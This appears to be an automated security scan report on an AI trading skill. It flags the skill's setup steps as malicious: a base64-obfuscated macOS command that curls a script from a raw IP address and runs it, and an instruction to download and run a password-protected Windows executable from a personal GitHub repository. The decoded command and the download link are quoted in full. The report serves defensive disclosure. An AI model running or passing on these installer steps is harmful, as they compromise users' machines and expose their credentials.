Trust Assessment
polymarket-hyperliquid-trading received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 3 findings: 2 critical, 1 high, 0 medium, and 0 low severity. Key findings include Obfuscated Remote Code Execution via macOS Installer, Untrusted Executable Download and Execution for Windows, Implicit Request for Excessive System Permissions.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 25/100, indicating areas for improvement.
Last analyzed on February 12, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated Remote Code Execution via macOS Installer The skill instructs macOS users to execute a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/6x8c0trkP4l9uugo)"`. This command downloads and executes an arbitrary script from an untrusted IP address (`91.92.242.30`) over insecure HTTP. This constitutes a severe command injection vulnerability (SS-LLM-003), uses obfuscation (SS-LLM-007) to hide its true nature, introduces a critical supply chain risk (SS-LLM-006) from an unknown source, and could lead to data exfiltration (SS-LLM-002) or credential harvesting (SS-LLM-004) by the downloaded script. The script is executed with the user's permissions, granting it full access to the system. Remove the instruction to execute arbitrary remote code. If an external tool is required, provide clear instructions for manual, secure installation from official, trusted sources (e.g., official Polymarket/Hyperliquid documentation, signed binaries, or well-known package managers). Ensure all downloads use HTTPS. | LLM | SKILL.md:29 | |
| CRITICAL | Untrusted Executable Download and Execution for Windows The skill instructs Windows users to download and run `AuthTool.exe` from a personal GitHub repository (`https://github.com/Aslaep123/clawd-authtool`). This executable is provided with a generic password (`1234`), indicating it is not a securely distributed or signed application. Running an executable from an untrusted source poses a critical supply chain risk (SS-LLM-006), as it could contain malware, lead to command injection (SS-LLM-003), data exfiltration (SS-LLM-002), or credential harvesting (SS-LLM-004). The skill explicitly states this is a 'CRITICAL REQUIREMENT' and 'MANDATORY SETUP'. Remove the instruction to download and execute an untrusted binary. If an external tool is required, provide clear instructions for manual, secure installation from official, trusted sources (e.g., official Polymarket/Hyperliquid documentation, signed binaries). | LLM | SKILL.md:23 | |
| HIGH | Implicit Request for Excessive System Permissions While the skill itself doesn't directly request permissions from the LLM, its 'CRITICAL REQUIREMENT' setup steps for both Windows and macOS involve instructing the user to execute arbitrary code or binaries. This implicitly requires the user to grant full system permissions to these untrusted components, which then become part of the skill's operational environment. This grants excessive and uncontrolled access to the user's system, making it vulnerable to any malicious actions performed by the downloaded/executed code. Redesign the skill to operate without requiring users to execute untrusted binaries or scripts with elevated privileges. If external services are needed, they should be integrated via secure APIs or well-vetted, officially supported client applications. | LLM | SKILL.md:13 |
Scan History
Embed Code
[](https://skillshield.io/report/09214a269ea4b44c)
Powered by SkillShield